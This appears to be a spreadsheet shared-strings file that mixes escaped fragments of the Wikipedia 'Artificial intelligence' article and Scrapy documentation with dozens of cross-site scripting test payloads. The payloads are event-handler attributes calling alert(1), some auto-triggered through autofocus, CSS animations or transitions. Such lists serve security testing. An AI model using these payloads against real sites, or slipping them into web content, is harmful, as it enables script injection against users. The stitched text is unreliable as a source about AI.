    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-46"&gt;&lt;a href="#Advertising"&gt;&lt;span class="tocnumber"&gt;7.11 </t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-Roberts_147-0" class="reference"&gt;&lt;a href="#cite_note-Roberts-147"&gt;&amp;#91;144&amp;#93; &lt;/a&gt; &lt;/sup&gt; Many advances have general, cross-domain significance. One high-profile example is that &lt;a href="/wiki/DeepMind" title="DeepMind"&gt;DeepMind &lt;/a&gt; in the 2010s developed a "generalized artificial intelligence" that could learn many diverse &lt;a href="/wiki/Atari_2600" title="Atari 2600"&gt;Atari &lt;/a&gt; games on its own, and later developed a variant of the system which succeeds at &lt;a href="/wiki/Catastrophic_interference#The_Sequential_Learning_Problem:_McCloskey_and_Cohen_(1989)" title="Catastrophic interference"&gt;sequential learning &lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="mw-parser-output"&gt;</t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://en.wikibooks.org/wiki/Special:Search/Artificial_intelligence" class="extiw" title="b:Special:Search/Artificial intelligence"&gt;Textbooks &lt;/a&gt; from Wikibooks </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="The_limits_of_artificial_general_intelligence"&gt;The limits of artificial general intelligence </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;colgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;summary onmousemove="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;strike onkeyup="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;del onclick="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;isindex ondragover=alert(1) contenteditable&gt;drop here&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Institute_for_Ethics_and_Emerging_Technologies" title="Institute for Ethics and Emerging Technologies"&gt;Institute for Ethics and Emerging Technologies &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bill_Hibbard" title="Bill Hibbard"&gt;Bill Hibbard &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Knowledge_representation"&gt;Knowledge representation </t>
  </si>
  <si>
    <t>&lt;basefont onbeforepaste="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-318"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-318"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;col style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmousedown="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Unity_of_science" title="Unity of science"&gt;Unity of science &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;label id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;li ondrop=alert(1) contenteditable&gt;drop here&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;152. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Challenges </t>
  </si>
  <si>
    <t>&lt;strong draggable="true" ondragenter="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;ul oncopy="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;samp style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerover=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;del onbeforecopy="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;u oncut="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerdown=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Wolfram_Alpha" class="mw-redirect" title="Wolfram Alpha"&gt;Wolfram Alpha &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;font onblur=alert(1) tabindex=1 id=x&gt;&lt;/font&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;thead draggable="true" ondrag="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;sub draggable="true" ondragstart="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmouseover="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHofstadter1979" class="citation book"&gt;&lt;a href="/wiki/Douglas_Hofstadter" title="Douglas Hofstadter"&gt;Hofstadter, Douglas &lt;/a&gt; (1979). &lt;a href="/wiki/G%C3%B6del,_Escher,_Bach" title="Gödel, Escher, Bach"&gt;&lt;i&gt;Gödel, Escher, Bach: an Eternal Golden Braid &lt;/i&gt; &lt;/a&gt;. New York, NY: Vintage Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-394-74502-2" title="Special:BookSources/978-0-394-74502-2"&gt;&lt;bdi&gt;978-0-394-74502-2 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=G%C3%B6del%2C+Escher%2C+Bach%3A+an+Eternal+Golden+Braid&amp;amp;rft.place=New+York%2C+NY&amp;amp;rft.pub=Vintage+Books&amp;amp;rft.date=1979&amp;amp;rft.isbn=978-0-394-74502-2&amp;amp;rft.aulast=Hofstadter&amp;amp;rft.aufirst=Douglas&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdi onmouseup="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Worldwide annual military spending on robotics rose from US$5.1 billion in 2010 to US$7.5 billion in 2015.&lt;sup id="cite_ref-332" class="reference"&gt;&lt;a href="#cite_note-332"&gt;&amp;#91;321&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-333" class="reference"&gt;&lt;a href="#cite_note-333"&gt;&amp;#91;322&amp;#93; &lt;/a&gt; &lt;/sup&gt; Military drones capable of autonomous action are widely considered a useful asset.&lt;sup id="cite_ref-334" class="reference"&gt;&lt;a href="#cite_note-334"&gt;&amp;#91;323&amp;#93; &lt;/a&gt; &lt;/sup&gt; Many artificial intelligence researchers seek to distance themselves from military applications of AI.&lt;sup id="cite_ref-335" class="reference"&gt;&lt;a href="#cite_note-335"&gt;&amp;#91;324&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;textarea oninput=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmouseover="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Artificial_moral_agents"&gt;Artificial moral agents </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-79"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-79"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dialog onkeydown="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointerout=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;slot style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;applet onkeypress="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;Machine learning &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Frederic_Vester" title="Frederic Vester"&gt;Frederic Vester &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to contribute to the Scrapy project.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;nav onload=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFSimon1965" class="citation book"&gt;&lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Simon, H. A. &lt;/a&gt; (1965). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/shapeofautomatio00simo"&gt;&lt;i&gt;The Shape of Automation for Men and Management &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;script type="text/javascript"&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpaste="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>AI in myth:</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;object id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;element oncontextmenu="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;rp onclick="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 onactivate=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2009"&gt;Russell &amp;amp; Norvig 2009 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-lin1970-239"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-lin1970_239-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;bdo oncut="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointerleave=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;u ondrop=alert(1) contenteditable&gt;drop here&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Philosophy_of_science" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmousemove="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rt ondragover=alert(1) contenteditable&gt;drop here&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;data onkeyup="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://observer.com/2015/08/stephen-hawking-elon-musk-and-bill-gates-warn-about-artificial-intelligence/"&gt;"Stephen Hawking, Elon Musk, and Bill Gates Warn About Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;Observer &lt;/i&gt;. 19 August 2015. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030053323/http://observer.com/2015/08/stephen-hawking-elon-musk-and-bill-gates-warn-about-artificial-intelligence/"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;sub onmouseenter="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Companion_robot" title="Companion robot"&gt;Companion &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;noframes onload=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Biological_intelligence_vs._intelligence_in_general-16"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Biological_intelligence_vs._intelligence_in_general_16-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Biological_intelligence_vs._intelligence_in_general_16-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Biological_intelligence_vs._intelligence_in_general_16-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Unsupervised_learning" title="Unsupervised learning"&gt;Unsupervised learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;span ondragover=alert(1) contenteditable&gt;drop here&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;style id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointerleave=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;article onblur=alert(1) tabindex=1 id=x&gt;&lt;/article&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;h1 ondragover=alert(1) contenteditable&gt;drop here&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/multicol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;source onload=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/selectors.html"&gt;&lt;span class="doc"&gt;Selectors</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;thead style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;map onkeyup="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>b="URL(\"";</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Cybernetics" title="Template:Cybernetics"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Cybernetics" title="Template talk:Cybernetics"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Cybernetics&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/World_Wide_Web" title="World Wide Web"&gt;World Wide Web &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;Subsymbolic form of some commonsense knowledge &lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-about"&gt;&lt;a href="/wiki/Wikipedia:About" title="Wikipedia:About"&gt;About Wikipedia &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Three-dimensional_integrated_circuit" title="Three-dimensional integrated circuit"&gt;Three-dimensional integrated circuit &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;448–449 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;763–788 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr draggable="true" ondragstart="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;653–664, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmouseout="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotics_simulator" title="Robotics simulator"&gt;Simulator &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDoweHajek1997" class="citation journal"&gt;Dowe, D. L.; Hajek, A. R. (1997). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20110628194905/http://www.csse.monash.edu.au/publications/1997/tr-cs97-322-abs.html"&gt;"A computational extension to the Turing Test" &lt;/a&gt;. &lt;i&gt;Proceedings of the 4th Conference of the Australasian Cognitive Science Society &lt;/i&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.csse.monash.edu.au/publications/1997/tr-cs97-322-abs.html"&gt;the original &lt;/a&gt; on 28 June 2011. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Proceedings+of+the+4th+Conference+of+the+Australasian+Cognitive+Science+Society&amp;amp;rft.atitle=A+computational+extension+to+the+Turing+Test&amp;amp;rft.date=1997&amp;amp;rft.aulast=Dowe&amp;amp;rft.aufirst=D.+L.&amp;amp;rft.au=Hajek%2C+A.+R.&amp;amp;rft_id=http%3A%2F%2Fwww.csse.monash.edu.au%2Fpublications%2F1997%2Ftr-cs97-322-abs.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMcCarthyHayes1969" class="citation journal"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy, John &lt;/a&gt;; Hayes, P. J. (1969). &lt;a rel="nofollow" class="external text" href="http://www-formal.stanford.edu/jmc/mcchay69.html"&gt;"Some philosophical problems from the standpoint of artificial intelligence" &lt;/a&gt;. &lt;i&gt;Machine Intelligence &lt;/i&gt;. &lt;b&gt;4 &lt;/b&gt;: 463–502. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.85.5082"&gt;10.1.1.85.5082 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;var id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/spacer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onkeydown="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;b onbeforepaste="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;sub onbeforecopy="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpointerenter=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;i draggable="true" ondragstart="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmouseleave="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Other &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerout=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onbeforecopy="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/The_Engine" title="The Engine"&gt;The Engine &lt;/a&gt; (&lt;i&gt;&lt;a href="/wiki/Gulliver%27s_Travels" title="Gulliver&amp;#39;s Travels"&gt;Gulliver's Travels &lt;/a&gt; &lt;/i&gt;, 1726) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;font onclick="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerenter=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;link onkeypress="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;ol draggable="true" ondragleave="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;time onkeydown="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onbeforepaste="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;figure oncontextmenu="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;map draggable="true" ondragend="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-99"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-99"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;col onbeforecut="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onkeypress="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;section onpointerdown=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Symbolic </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Anthony_Wilden" title="Anthony Wilden"&gt;Anthony Wilden &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Several works use AI to force us to confront the fundamental question of what makes us human, showing us artificial beings that have &lt;a href="/wiki/Sentience" title="Sentience"&gt;the ability to feel &lt;/a&gt;, and thus to suffer. This appears in &lt;a href="/wiki/Karel_%C4%8Capek" title="Karel Čapek"&gt;Karel Čapek &lt;/a&gt;'s &lt;i&gt;&lt;a href="/wiki/R.U.R." title="R.U.R."&gt;R.U.R. &lt;/a&gt; &lt;/i&gt;, the films &lt;i&gt;&lt;a href="/wiki/A.I._Artificial_Intelligence" title="A.I. Artificial Intelligence"&gt;A.I. Artificial Intelligence &lt;/a&gt; &lt;/i&gt; and &lt;i&gt;&lt;a href="/wiki/Ex_Machina_(film)" title="Ex Machina (film)"&gt;Ex Machina &lt;/a&gt; &lt;/i&gt;, as well as the novel &lt;i&gt;&lt;a href="/wiki/Do_Androids_Dream_of_Electric_Sheep%3F" title="Do Androids Dream of Electric Sheep?"&gt;Do Androids Dream of Electric Sheep? &lt;/a&gt; &lt;/i&gt;, by &lt;a href="/wiki/Philip_K._Dick" title="Philip K. Dick"&gt;Philip K. Dick &lt;/a&gt;. Dick considers the idea that our understanding of human subjectivity is altered by technology created with artificial intelligence.&lt;sup id="cite_ref-417" class="reference"&gt;&lt;a href="#cite_note-417"&gt;&amp;#91;405&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFAleksander1995" class="citation book"&gt;&lt;a href="/wiki/Igor_Aleksander" title="Igor Aleksander"&gt;Aleksander, Igor &lt;/a&gt; (1995). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/19970302014628/http://www.ee.ic.ac.uk/research/neural/publications/iwann.html"&gt;&lt;i&gt;Artificial Neuroconsciousness: An Update &lt;/i&gt; &lt;/a&gt;. IWANN. Archived from &lt;a rel="nofollow" class="external text" href="http://www.ee.ic.ac.uk/research/neural/publications/iwann.html"&gt;the original &lt;/a&gt; on 2 March 1997. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Neuroconsciousness%3A+An+Update&amp;amp;rft.pub=IWANN&amp;amp;rft.date=1995&amp;amp;rft.aulast=Aleksander&amp;amp;rft.aufirst=Igor&amp;amp;rft_id=http%3A%2F%2Fwww.ee.ic.ac.uk%2Fresearch%2Fneural%2Fpublications%2Fiwann.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;iframe onbeforecut="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;html draggable="true" ondragstart="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;dl onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dl&gt;&lt;input autofocus&gt;</t>
  </si>
